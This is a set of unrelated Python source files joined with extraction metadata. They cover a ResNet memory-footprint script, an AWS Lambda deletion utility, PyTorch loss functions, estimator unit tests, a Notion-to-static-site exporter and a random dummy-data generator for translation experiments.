graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
graph_bytes = resolved_bytes.subs({feature_channels_symbol: features_dim})
print('{}\t{}\t{}'.format(features_dim, graph_params, graph_bytes))
print('\nAlgorithmic total memory footprint by feature channels, params:')
resolved_footprint = alg_footprint.subs(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
graph_footprint = resolved_footprint.subs({feature_channels_symbol: features_dim})
print('{}\t{}\t{}'.format(features_dim, graph_params, graph_footprint))
print('\nAlgorithmic minimal memory footprint by feature channels, params:')
full_subs = dict(bind_subs)
for features_dim in feature_channel_dims:
graph_params = resolved_params.subs({feature_channels_symbol: features_dim})
full_subs[feature_channels_symbol] = features_dim
graph_min_foot = graph.calcMinimalFootprint(symbol_subs=full_subs)
print('{}\t{}\t{}'.format(features_dim, graph_params, graph_min_foot))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--depth', type=int, default=50, help='ResNet model size')
parser.add_argument('--filter_scale', type=float, default=1.0,
help='ResNet model filter scale')
args = parser.parse_args()
run_tf_image_resnet(depth=args.depth,
filter_scale=args.filter_scale)
| [
"sys.setrecursionlimit",
"argparse.ArgumentParser",
"os.path.join",
"catamount.api.utils.getPositiveIntSymbolFromString",
"sympy.Max",
"catamount.api.utils.getIntSymbolFromString",
"os.walk"
] | [((83, 111), 'sys.setrecursionlimit', 'sys.setrecursionlimit', (['(50000)'], {}), '(50000)\n', (104, 111), False, 'import sys\n'), ((1298, 1323), 'os.walk', 'os.walk', (['test_outputs_dir'], {}), '(test_outputs_dir)\n', (1305, 1323), False, 'import os\n'), ((2712, 2763), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""out_classes"""'], {}), "('out_classes')\n", (2748, 2763), False, 'from catamount.api import utils\n'), ((2791, 2844), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""subbatch_size"""'], {}), "('subbatch_size')\n", (2827, 2844), False, 'from catamount.api import utils\n'), ((2871, 2923), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""image_height"""'], {}), "('image_height')\n", (2907, 2923), False, 'from catamount.api import utils\n'), ((2949, 3000), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""image_width"""'], {}), "('image_width')\n", (2985, 3000), False, 'from catamount.api import utils\n'), ((3030, 3085), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""num_in_channels"""'], {}), "('num_in_channels')\n", (3066, 3085), False, 'from catamount.api import utils\n'), ((3111, 3155), 'catamount.api.utils.getIntSymbolFromString', 'utils.getIntSymbolFromString', (['"""graph::iters"""'], {}), "('graph::iters')\n", (3139, 3155), False, 'from catamount.api import utils\n'), ((3186, 3242), 'catamount.api.utils.getPositiveIntSymbolFromString', 'utils.getPositiveIntSymbolFromString', (['"""feature_channels"""'], {}), "('feature_channels')\n", (3222, 3242), False, 'from catamount.api import utils\n'), ((18451, 18476), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (18474, 18476), False, 'import argparse\n'), ((1537, 1565), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (1549, 1565), False, 'import os\n'), ((10605, 10620), 'sympy.Max', 'sympy.Max', (['x', 'y'], {}), '(x, y)\n', (10614, 10620), False, 'import sympy\n')] |
#!/usr/bin/env python3
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import boto3
import os
import sys
from lambdautils import create_session
def delete_func(session, name):
"""Delete the lambda function and all of its versions.
"""
client = session.client('lambda')
resp = client.delete_function(FunctionName=args.name)
print(resp)
def setup_parser():
parser = argparse.ArgumentParser(
description='Script for deleting lambda functions. To supply arguments from a file, provide the filename prepended with an `@`.',
fromfile_prefix_chars = '@')
parser.add_argument(
'--aws-credentials', '-a',
metavar = '<file>',
default = os.environ.get('AWS_CREDENTIALS'),
type = argparse.FileType('r'),
help = 'File with credentials for connecting to AWS (default: AWS_CREDENTIALS)')
parser.add_argument(
'name',
help = 'Name of function.')
return parser
if __name__ == '__main__':
parser = setup_parser()
args = parser.parse_args()
if args.aws_credentials is None:
# This allows aws roles to be used to create sessions.
session = boto3.session.Session()
else:
session = create_session(args.aws_credentials)
delete_func(session, args.name)
| [
"argparse.FileType",
"boto3.session.Session",
"argparse.ArgumentParser",
"os.environ.get",
"lambdautils.create_session"
] | [((978, 1169), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Script for deleting lambda functions. To supply arguments from a file, provide the filename prepended with an `@`."""', 'fromfile_prefix_chars': '"""@"""'}), "(description=\n 'Script for deleting lambda functions. To supply arguments from a file, provide the filename prepended with an `@`.'\n , fromfile_prefix_chars='@')\n", (1001, 1169), False, 'import argparse\n'), ((1751, 1774), 'boto3.session.Session', 'boto3.session.Session', ([], {}), '()\n', (1772, 1774), False, 'import boto3\n'), ((1803, 1839), 'lambdautils.create_session', 'create_session', (['args.aws_credentials'], {}), '(args.aws_credentials)\n', (1817, 1839), False, 'from lambdautils import create_session\n'), ((1285, 1318), 'os.environ.get', 'os.environ.get', (['"""AWS_CREDENTIALS"""'], {}), "('AWS_CREDENTIALS')\n", (1299, 1318), False, 'import os\n'), ((1335, 1357), 'argparse.FileType', 'argparse.FileType', (['"""r"""'], {}), "('r')\n", (1352, 1357), False, 'import argparse\n')] |
import torch
import torch.nn as nn
import torch.nn.functional as F
LOGEPS = 1.e-6
def soft_dice_loss(logits, targets, smooth=1.0): # targets is one hot
probs = logits.softmax(dim=1)
n_classes = logits.shape[1]
loss = 0
for i_class in range(n_classes):
loss += dice_loss_perclass(probs[:,i_class], targets[:,i_class], smooth)
return loss / n_classes
def dice_loss_perclass(probs, targets, smooth=1.):
intersection = probs * targets.float()
return 1 - 2. * (intersection.sum()+smooth) / (probs.sum()+targets.sum()+smooth)
def soft_cross_entropy_loss(pred_logit, target):
log_pred = F.log_softmax(pred_logit, dim=-1)
loss = -(log_pred * target).mean()
return loss
def batch_det(input):
return torch.cat([torch.unsqueeze(input[i].det(), dim=0) for i in range(input.shape[0])])\
def gaussian_klloss(p_mu, p_sigma, q_mu, q_sigma):
# return average KLLoss on one sample
assert p_mu.shape == p_sigma.shape == q_mu.shape == q_sigma.shape
cov_p = torch.diag_embed(p_sigma)
q_sigma_inverse = 1 / q_sigma
q_cov_inverse = torch.diag_embed(q_sigma_inverse)
batch_dev_KLLoss = (torch.log(torch.prod(q_sigma, dim=-1) / torch.prod(p_sigma, dim=-1)) - p_mu.shape[-1] +
torch.sum(torch.diagonal(q_cov_inverse @ cov_p, dim1=-2, dim2=-1), dim=-1) +
((q_mu - p_mu).unsqueeze(dim=-2) @ q_cov_inverse @ (q_mu - p_mu).unsqueeze(dim=-1)).squeeze()) / 2
return torch.sum(batch_dev_KLLoss) / p_mu.shape[0], batch_dev_KLLoss
def binary_cross_entropy_with_weights(output_P, target, positive_weights):
bceloss = - ((1 - positive_weights) * target * output_P.log() + positive_weights
* (1 - target) * (1 - output_P).log()).mean()
return bceloss
def confidence_loss(target, pred_logit, confidence, label):
log_pred = F.log_softmax(pred_logit, dim=-1)
ce_loss = -(log_pred * target).sum(dim=-1)
p_target = target[torch.arange(target.size(0)), label].clamp(LOGEPS, 1 - LOGEPS)
reject_loss = -torch.log(1 - p_target)
return ce_loss, reject_loss
def confidence_loss_v2(target, pred_logit, confidence, label):
log_pred = F.log_softmax(pred_logit, dim=-1)
ce_loss = -(log_pred * target).sum(dim=-1)
p_target = target[torch.arange(target.size(0)), label]
reject_loss = -(p_target * confidence.log() + (1 - p_target) * (1 - confidence).log())
return ce_loss, reject_loss
def confidence_loss_v3(target, pred_logit, confidence, label):
log_pred = F.log_softmax(pred_logit / (confidence * 10), dim=-1)
ce_loss = -(log_pred * target).sum(dim=-1)
reject_loss = torch.zeros(ce_loss.shape)
return ce_loss, reject_loss
def confidence_loss_v2_noCE(target, confidence, label, alpha, gamma):
p_target = target[torch.arange(target.size(0)), label]
conf_loss = -(alpha * p_target * (1 - confidence)**gamma * confidence.log() +
(1 - alpha) * (1 - p_target) * confidence**gamma * (1 - confidence).log())
return conf_loss
def confidence_loss_v2_noCE_CheX(target, confidence, label, alpha, gamma):
zero_label = (label == 0).to(torch.float32)
one_label = (label == 1).to(torch.float32)
# print(one_label)
confidence_target = zero_label * (1 - target) + one_label * target
conf_loss = -(alpha * confidence_target * (1 - confidence)**gamma * confidence.log() +
(1 - alpha) * (1 - confidence_target) * confidence**gamma * (1 - confidence).log())
return conf_loss
| [
"torch.diagonal",
"torch.log",
"torch.prod",
"torch.sum",
"torch.nn.functional.log_softmax",
"torch.diag_embed",
"torch.zeros"
] | [((625, 658), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['pred_logit'], {'dim': '(-1)'}), '(pred_logit, dim=-1)\n', (638, 658), True, 'import torch.nn.functional as F\n'), ((1011, 1036), 'torch.diag_embed', 'torch.diag_embed', (['p_sigma'], {}), '(p_sigma)\n', (1027, 1036), False, 'import torch\n'), ((1091, 1124), 'torch.diag_embed', 'torch.diag_embed', (['q_sigma_inverse'], {}), '(q_sigma_inverse)\n', (1107, 1124), False, 'import torch\n'), ((1856, 1889), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['pred_logit'], {'dim': '(-1)'}), '(pred_logit, dim=-1)\n', (1869, 1889), True, 'import torch.nn.functional as F\n'), ((2178, 2211), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['pred_logit'], {'dim': '(-1)'}), '(pred_logit, dim=-1)\n', (2191, 2211), True, 'import torch.nn.functional as F\n'), ((2523, 2576), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['(pred_logit / (confidence * 10))'], {'dim': '(-1)'}), '(pred_logit / (confidence * 10), dim=-1)\n', (2536, 2576), True, 'import torch.nn.functional as F\n'), ((2643, 2669), 'torch.zeros', 'torch.zeros', (['ce_loss.shape'], {}), '(ce_loss.shape)\n', (2654, 2669), False, 'import torch\n'), ((2041, 2064), 'torch.log', 'torch.log', (['(1 - p_target)'], {}), '(1 - p_target)\n', (2050, 2064), False, 'import torch\n'), ((1473, 1500), 'torch.sum', 'torch.sum', (['batch_dev_KLLoss'], {}), '(batch_dev_KLLoss)\n', (1482, 1500), False, 'import torch\n'), ((1271, 1326), 'torch.diagonal', 'torch.diagonal', (['(q_cov_inverse @ cov_p)'], {'dim1': '(-2)', 'dim2': '(-1)'}), '(q_cov_inverse @ cov_p, dim1=-2, dim2=-1)\n', (1285, 1326), False, 'import torch\n'), ((1159, 1186), 'torch.prod', 'torch.prod', (['q_sigma'], {'dim': '(-1)'}), '(q_sigma, dim=-1)\n', (1169, 1186), False, 'import torch\n'), ((1189, 1216), 'torch.prod', 'torch.prod', (['p_sigma'], {'dim': '(-1)'}), '(p_sigma, dim=-1)\n', (1199, 1216), False, 'import torch\n')] |
import unittest
import numpy as np
import pandas as pd
from enda.estimators import EndaEstimatorWithFallback, EndaStackingEstimator, EndaNormalizedEstimator
from tests.test_utils import TestUtils
from enda.ml_backends.sklearn_estimator import EndaSklearnEstimator
try:
from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor
from sklearn.linear_model import LinearRegression
except ImportError as e:
raise ImportError("scikit-learn required")
class TestEndaEstimatorWithFallback(unittest.TestCase):
def test_1(self):
# read sample dataset from unittest files
train_set, test_set, target_name = TestUtils.read_example_a_train_test_sets()
# remove some values of 'tso_forecast_load_mw' the test_set on purpose
test_set.loc[test_set.index == '2020-09-20 00:30:00+02:00', 'tso_forecast_load_mw'] = np.NaN
test_set.loc[test_set.index >= '2020-09-23 23:15:00+02:00', 'tso_forecast_load_mw'] = np.NaN
# the dtype of the column should still be 'float64'
self.assertEqual('float64', str(test_set['tso_forecast_load_mw'].dtype))
m = EndaEstimatorWithFallback(
resilient_column='tso_forecast_load_mw',
estimator_with=EndaSklearnEstimator(AdaBoostRegressor()),
estimator_without=EndaSklearnEstimator(RandomForestRegressor())
)
m.train(train_set, target_name)
# print(m.predict_both(test_set, target_name))
prediction = m.predict(test_set, target_name)
# print(prediction)
# EndaEstimatorWithFallback performs a prediction even when 'tso_forecast_load_mw' was NaN
# check there is no NaN value in the prediction :
self.assertEqual(0, prediction[target_name].isna().sum())
class TestEndaStackingEstimator(unittest.TestCase):
def test_1(self):
train_set, test_set, target_name = TestUtils.read_example_a_train_test_sets()
m = EndaStackingEstimator(
base_estimators={
"ada": EndaSklearnEstimator(RandomForestRegressor()),
"rf": EndaSklearnEstimator(LinearRegression())
},
final_estimator=EndaSklearnEstimator(AdaBoostRegressor()),
base_stack_split_pct=0.10
)
m.train(train_set, target_name)
prediction = m.predict(test_set, target_name)
# print(prediction)
self.assertIsInstance(prediction.index, pd.DatetimeIndex)
self.assertTrue((test_set.index == prediction.index).all())
self.assertEqual(0, prediction[target_name].isna().sum())
# also check the underlying base predictions
base_predictions = m.predict_base_estimators(test_set, target_name)
# print(base_predictions)
self.assertListEqual(["ada", "rf"], list(base_predictions.columns))
class TestEndaNormalizedEstimator(unittest.TestCase):
def test_1(self):
train_set, test_set, target_name = TestUtils.read_example_a_train_test_sets()
m = EndaNormalizedEstimator(
inner_estimator=EndaSklearnEstimator(RandomForestRegressor()),
target_col="load_kw",
normalization_col="subscribed_power_kva",
columns_to_normalize=["contracts_count", "estimated_annual_consumption_kwh"]
)
m.train(train_set, target_name)
prediction = m.predict(test_set, target_name)
# print(prediction)
self.assertIsInstance(prediction.index, pd.DatetimeIndex)
self.assertTrue((test_set.index == prediction.index).all())
self.assertEqual(0, prediction[target_name].isna().sum())
| [
"tests.test_utils.TestUtils.read_example_a_train_test_sets",
"sklearn.ensemble.RandomForestRegressor",
"sklearn.linear_model.LinearRegression",
"sklearn.ensemble.AdaBoostRegressor"
] | [((643, 685), 'tests.test_utils.TestUtils.read_example_a_train_test_sets', 'TestUtils.read_example_a_train_test_sets', ([], {}), '()\n', (683, 685), False, 'from tests.test_utils import TestUtils\n'), ((1881, 1923), 'tests.test_utils.TestUtils.read_example_a_train_test_sets', 'TestUtils.read_example_a_train_test_sets', ([], {}), '()\n', (1921, 1923), False, 'from tests.test_utils import TestUtils\n'), ((2943, 2985), 'tests.test_utils.TestUtils.read_example_a_train_test_sets', 'TestUtils.read_example_a_train_test_sets', ([], {}), '()\n', (2983, 2985), False, 'from tests.test_utils import TestUtils\n'), ((1251, 1270), 'sklearn.ensemble.AdaBoostRegressor', 'AdaBoostRegressor', ([], {}), '()\n', (1268, 1270), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((1324, 1347), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ([], {}), '()\n', (1345, 1347), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((2187, 2206), 'sklearn.ensemble.AdaBoostRegressor', 'AdaBoostRegressor', ([], {}), '()\n', (2204, 2206), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((3073, 3096), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ([], {}), '()\n', (3094, 3096), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((2034, 2057), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ([], {}), '()\n', (2055, 2057), False, 'from sklearn.ensemble import AdaBoostRegressor, RandomForestRegressor\n'), ((2103, 2121), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2119, 2121), False, 'from sklearn.linear_model import LinearRegression\n')] |
from notion4ever import notion2json
from notion4ever import structuring
from notion4ever import site_generation
import logging
import json
from pathlib import Path
import shutil
import argparse
import os
from notion_client import Client
def main():
parser = argparse.ArgumentParser(description=("Notion4ever: Export all your"
"notion content to markdown and html and serve it as static site."))
parser.add_argument('--notion_token', '-n',
type=str, help="Set your notion API token.",
default=os.environ.get("NOTION_TOKEN"))
parser.add_argument('--notion_page_id', '-p',
type=str, help="Set page_id of the target page.",
default=os.environ.get("NOTION_PAGE_ID"))
parser.add_argument('--output_dir', '-od',
type=str, default="./_site")
parser.add_argument('--templates_dir', '-td',
type=str, default="./_templates")
parser.add_argument('--sass_dir', '-sd',
type=str, default="./_sass")
parser.add_argument('--build_locally', '-bl',
type=bool, default=False)
parser.add_argument('--download_files', '-df',
type=bool, default=True)
parser.add_argument('--site_url', '-su',
type=str, default=os.environ.get("SITE_URL"))
parser.add_argument('--remove_before', '-rb',
type=bool, default=False)
parser.add_argument('--include_footer', '-if',
type=bool, default=False)
parser.add_argument('--logging_level', '-ll',
type=str, default="INFO")
config = vars(parser.parse_args())
config["include_footer"] = os.environ.get("INCLUDE_FOOTER")
if config["logging_level"] == "DEBUG":
llevel = logging.DEBUG
else:
llevel = logging.INFO
logging.basicConfig(format="%(asctime)s %(levelname)s: %(message)s",
level=llevel)
if config["remove_before"]:
if Path(config["output_dir"]).exists():
shutil.rmtree(config["output_dir"])
logging.debug("🤖 Removed old site files")
notion = Client(auth=config["notion_token"])
logging.info("🤖 Notion authentification completed successfully.")
# It will rewrite this file
raw_notion = {}
filename = "./notion_content.json"
filename_structured = "./notion_structured.json"
# Stage 1. Downloading (reading) raw notion content and save it to json file
if Path(filename).exists():
logging.info("🤖 Reading existing raw notion content.")
with open(filename, "r") as f:
raw_notion = json.load(f)
else:
logging.info("🤖 Started raw notion content parsing.")
notion2json.notion_page_parser(config["notion_page_id"],
notion=notion,
filename=filename,
notion_json=raw_notion)
logging.info(f"🤖 Downloaded raw notion content. Saved at {filename}")
# Stage 2. Structuring data
logging.info(f"🤖 Started structuring notion data")
structured_notion = structuring.structurize_notion_content(raw_notion,
config)
with open(filename_structured, "w+", encoding="utf-8") as f:
json.dump(structured_notion, f, ensure_ascii=False, indent=4)
logging.info(f"🤖 Finished structuring notion data")
if Path(filename_structured).exists():
logging.info("🤖 Reading existing raw notion content.")
with open(filename_structured, "r") as f:
structured_notion = json.load(f)
# Stage 3. Generating site from template and data
if config["build_locally"]:
structured_notion['base_url'] = \
str(Path(config["output_dir"]).resolve())
else:
structured_notion['base_url'] = config["site_url"]
logging.info(("🤖 Started generating site "
f"{'locally' if config['build_locally'] else ''} "
f"to {config['output_dir']}"))
site_generation.generate_site(structured_notion, config)
logging.info("🤖 Finished generating site.")
if __name__ == "__main__":
main() | [
"logging.basicConfig",
"notion4ever.site_generation.generate_site",
"logging.debug",
"argparse.ArgumentParser",
"pathlib.Path",
"notion4ever.notion2json.notion_page_parser",
"os.environ.get",
"notion_client.Client",
"notion4ever.structuring.structurize_notion_content",
"shutil.rmtree",
"json.load",
"logging.info",
"json.dump"
] | [((265, 406), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Notion4ever: Export all yournotion content to markdown and html and serve it as static site."""'}), "(description=\n 'Notion4ever: Export all yournotion content to markdown and html and serve it as static site.'\n )\n", (288, 406), False, 'import argparse\n'), ((1581, 1613), 'os.environ.get', 'os.environ.get', (['"""INCLUDE_FOOTER"""'], {}), "('INCLUDE_FOOTER')\n", (1595, 1613), False, 'import os\n'), ((1738, 1825), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s %(levelname)s: %(message)s"""', 'level': 'llevel'}), "(format='%(asctime)s %(levelname)s: %(message)s', level=\n llevel)\n", (1757, 1825), False, 'import logging\n'), ((2039, 2074), 'notion_client.Client', 'Client', ([], {'auth': "config['notion_token']"}), "(auth=config['notion_token'])\n", (2045, 2074), False, 'from notion_client import Client\n'), ((2079, 2144), 'logging.info', 'logging.info', (['"""🤖 Notion authentification completed successfully."""'], {}), "('🤖 Notion authentification completed successfully.')\n", (2091, 2144), False, 'import logging\n'), ((2951, 3001), 'logging.info', 'logging.info', (['f"""🤖 Started structuring notion data"""'], {}), "(f'🤖 Started structuring notion data')\n", (2963, 3001), False, 'import logging\n'), ((3026, 3084), 'notion4ever.structuring.structurize_notion_content', 'structuring.structurize_notion_content', (['raw_notion', 'config'], {}), '(raw_notion, config)\n', (3064, 3084), False, 'from notion4ever import structuring\n'), ((3285, 3336), 'logging.info', 'logging.info', (['f"""🤖 Finished structuring notion data"""'], {}), "(f'🤖 Finished structuring notion data')\n", (3297, 3336), False, 'import logging\n'), ((3800, 3925), 'logging.info', 'logging.info', (['f"""🤖 Started generating site {\'locally\' if config[\'build_locally\'] else \'\'} to {config[\'output_dir\']}"""'], {}), '(\n f"🤖 Started generating site {\'locally\' if config[\'build_locally\'] else \'\'} to {config[\'output_dir\']}"\n )\n', (3812, 3925), False, 'import logging\n'), ((3964, 4020), 'notion4ever.site_generation.generate_site', 'site_generation.generate_site', (['structured_notion', 'config'], {}), '(structured_notion, config)\n', (3993, 4020), False, 'from notion4ever import site_generation\n'), ((4026, 4069), 'logging.info', 'logging.info', (['"""🤖 Finished generating site."""'], {}), "('🤖 Finished generating site.')\n", (4038, 4069), False, 'import logging\n'), ((2412, 2466), 'logging.info', 'logging.info', (['"""🤖 Reading existing raw notion content."""'], {}), "('🤖 Reading existing raw notion content.')\n", (2424, 2466), False, 'import logging\n'), ((2562, 2615), 'logging.info', 'logging.info', (['"""🤖 Started raw notion content parsing."""'], {}), "('🤖 Started raw notion content parsing.')\n", (2574, 2615), False, 'import logging\n'), ((2624, 2742), 'notion4ever.notion2json.notion_page_parser', 'notion2json.notion_page_parser', (["config['notion_page_id']"], {'notion': 'notion', 'filename': 'filename', 'notion_json': 'raw_notion'}), "(config['notion_page_id'], notion=notion,\n filename=filename, notion_json=raw_notion)\n", (2654, 2742), False, 'from notion4ever import notion2json\n'), ((2844, 2913), 'logging.info', 'logging.info', (['f"""🤖 Downloaded raw notion content. Saved at {filename}"""'], {}), "(f'🤖 Downloaded raw notion content. Saved at {filename}')\n", (2856, 2913), False, 'import logging\n'), ((3218, 3279), 'json.dump', 'json.dump', (['structured_notion', 'f'], {'ensure_ascii': '(False)', 'indent': '(4)'}), '(structured_notion, f, ensure_ascii=False, indent=4)\n', (3227, 3279), False, 'import json\n'), ((3393, 3447), 'logging.info', 'logging.info', (['"""🤖 Reading existing raw notion content."""'], {}), "('🤖 Reading existing raw notion content.')\n", (3405, 3447), False, 'import logging\n'), ((528, 558), 'os.environ.get', 'os.environ.get', (['"""NOTION_TOKEN"""'], {}), "('NOTION_TOKEN')\n", (542, 558), False, 'import os\n'), ((685, 717), 'os.environ.get', 'os.environ.get', (['"""NOTION_PAGE_ID"""'], {}), "('NOTION_PAGE_ID')\n", (699, 717), False, 'import os\n'), ((1222, 1248), 'os.environ.get', 'os.environ.get', (['"""SITE_URL"""'], {}), "('SITE_URL')\n", (1236, 1248), False, 'import os\n'), ((1935, 1970), 'shutil.rmtree', 'shutil.rmtree', (["config['output_dir']"], {}), "(config['output_dir'])\n", (1948, 1970), False, 'import shutil\n'), ((1983, 2024), 'logging.debug', 'logging.debug', (['"""🤖 Removed old site files"""'], {}), "('🤖 Removed old site files')\n", (1996, 2024), False, 'import logging\n'), ((2379, 2393), 'pathlib.Path', 'Path', (['filename'], {}), '(filename)\n', (2383, 2393), False, 'from pathlib import Path\n'), ((2531, 2543), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2540, 2543), False, 'import json\n'), ((3349, 3374), 'pathlib.Path', 'Path', (['filename_structured'], {}), '(filename_structured)\n', (3353, 3374), False, 'from pathlib import Path\n'), ((3530, 3542), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3539, 3542), False, 'import json\n'), ((1886, 1912), 'pathlib.Path', 'Path', (["config['output_dir']"], {}), "(config['output_dir'])\n", (1890, 1912), False, 'from pathlib import Path\n'), ((3688, 3714), 'pathlib.Path', 'Path', (["config['output_dir']"], {}), "(config['output_dir'])\n", (3692, 3714), False, 'from pathlib import Path\n')] |
#!/usr/bin/env python
# Generates dummy data for testing
from rtg.data.dataset import Batch, Example
import argparse
from rtg import log, TranslationExperiment as Experiment
from rtg.utils import IO
from rtg.data.dataset import LoopingIterable
import numpy as np
from pathlib import Path
from typing import Optional, Dict, Union, Any
class BatchIterable:
# TODO: How to specify Type Hint for this as Iterable[Batch]
"""Dummy equivalent of dataprep.BatchIterable"""
def __init__(self, vocab_size, batch_size, n_batches, min_seq_len=5, max_seq_len=20,
n_reserved_toks=Batch.eos_val + 1, reverse=True, batch_first=False):
"""
"Generate random data for a src-tgt copy task."
:param vocab_size: Vocabulary size
:param batch_size:
:param n_batches: number of batches to produce
:param n_reserved_toks: number of reserved tokens (such as pad, EOS, BOS, UNK etc)
:param reverse: reverse the target
:param batch_first: first dimension is batch
:return:
"""
self.vocab_size = vocab_size
self.batch_size = batch_size
self.num_batches = n_batches
self.min_seq_len = min_seq_len
self.max_seq_len = max_seq_len
self.n_reserved_toks = n_reserved_toks
self.reverse = reverse
self.batch_first = batch_first
def make_an_ex(self):
seq_len = np.random.randint(self.min_seq_len, self.max_seq_len)
data = np.random.randint(self.n_reserved_toks, self.vocab_size, size=(seq_len,))
tgt = self.vocab_size + (self.n_reserved_toks - 1) - data if self.reverse else data
return Example(data.tolist(), tgt.tolist())
def __iter__(self):
for i in range(self.num_batches):
exs = [self.make_an_ex() for _ in range(self.batch_size)]
yield Batch(exs, sort_dec=True, batch_first=self.batch_first)
class DummyExperiment(Experiment):
"""
A dummy experiment for testing;
this produces random data and leaves no trace on disk
"""
def __init__(self, work_dir: Union[str, Path], read_only=True,
config: Optional[Dict[str, Any]] = None, vocab_size: int = 20,
train_batches=30, val_batches=5):
super().__init__(work_dir, read_only, config)
self.vocab_size = vocab_size
self.train_batches = train_batches
self.val_batches = val_batches
def get_train_data(self, batch_size: int, steps: int = 0, sort_desc=True, sort_by='random',
batch_first=True, shuffle=False, copy_xy=False, fine_tune=False):
train_data = BatchIterable(self.vocab_size, batch_size, self.train_batches,
reverse=False, batch_first=batch_first)
if steps > 0:
train_data = LoopingIterable(train_data, steps)
return train_data
def get_val_data(self, batch_size: int, sort_desc=True, batch_first=True,
shuffle=False, copy_xy=False):
assert not shuffle, 'Not supported'
assert not copy_xy, 'Not supported'
val_data = BatchIterable(self.vocab_size, batch_size, self.val_batches,
reverse=False, batch_first=batch_first)
return val_data
def parse_args():
p = argparse.ArgumentParser(description='Generates random data for testing',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
p.add_argument('exp', type=Path, help="path to experiment directory")
p.add_argument('-s', '--seed', type=int, default=0,
help='seed for reproducing the randomness. 0 is no seed.')
p.add_argument('-mn', '--min-len', type=int, default=4, help='Minimum length sequence')
p.add_argument('-mx', '--max-len', type=int, default=15, help='Maximum length sequence')
p.add_argument('-v', '--vocab', dest='vocab_size', type=int, default=200,
help='Vocabulary size')
p.add_argument('-r', '--reserved', dest='num_reserved',
type=int, default=4, help='Reserved tokens')
p.add_argument('-nt', '--num-train', type=int, default=1000, help='Number of train sequences')
p.add_argument('-nv', '--num-val', type=int, default=500, help='Number of validation seqs')
p.add_argument('--rev-vocab', action="store_true",
help="Reverse the target side vocabulary")
p.add_argument('--rev-seq', action="store_true",
help="Reverse the target side sequence order")
return vars(p.parse_args())
def generate_parallel(min_len, max_len, vocab_size, num_reserved, num_exs, rev_vocab, rev_seq):
lower, higher = num_reserved, vocab_size
for _ in range(num_exs):
_len = np.random.randint(min_len, max_len)
src_seq = np.random.randint(lower, higher, size=_len)
tgt_seq = src_seq.copy()
if rev_vocab:
tgt_seq = higher + num_reserved - src_seq
if rev_seq:
tgt_seq = np.flip(tgt_seq, axis=0)
yield src_seq, tgt_seq
def write_tsv(data, out):
count = 0
for src_seq, tgt_seq in data:
src_seq, tgt_seq = ' '.join(map(str, src_seq)), ' '.join(map(str, tgt_seq))
out.write(f'{src_seq}\t{tgt_seq}\n')
count += 1
log.info(f"Wrote {count} records")
def write_parallel(data, src_file, tgt_file):
count = 0
with IO.writer(src_file) as src_f, IO.writer(tgt_file) as tgt_f:
for src_seq, tgt_seq in data:
src_seq = ' '.join(map(str, src_seq))
tgt_seq = ' '.join(map(str, tgt_seq))
src_f.write(f'{src_seq}\n')
tgt_f.write(f'{tgt_seq}\n')
count += 1
log.info(f"Wrote {count} records to {src_file} and {tgt_file}")
def main(args):
work_dir: Path = args.pop('exp')
work_dir.mkdir(exist_ok=True, parents=True)
log.info(f"Setting up a dummy experiment at {work_dir}")
num_train, num_val = args.pop('num_train'), args.pop('num_val')
train_data = generate_parallel(**args, num_exs=num_train)
val_data = generate_parallel(**args, num_exs=num_val)
train_files = str(work_dir / 'train.raw.src'), str(work_dir / 'train.raw.tgt')
val_files = str(work_dir / 'valid.raw.src'), str(work_dir / 'valid.raw.tgt')
write_parallel(train_data, *train_files)
write_parallel(val_data, *val_files)
config = {
'prep': {
'train_src': train_files[0],
'train_tgt': train_files[1],
'valid_src': val_files[0],
'valid_tgt': val_files[1],
'pieces': 'word',
'truncate': True,
'src_len': args['max_len'],
'tgt_len': args['max_len'],
}}
if args.get('rev_vocab'):
# shared vocabulary would be confusing
config['prep'].update({
'shared_vocab': False,
'max_src_types': args['vocab_size'],
'max_tgt_types': args['vocab_size']
})
else:
config['prep'].update({
'shared_vocab': True,
'max_types': args['vocab_size']
})
exp = Experiment(work_dir, config=config)
exp.store_config()
if __name__ == '__main__':
args = parse_args()
log.info(f"Args {args}")
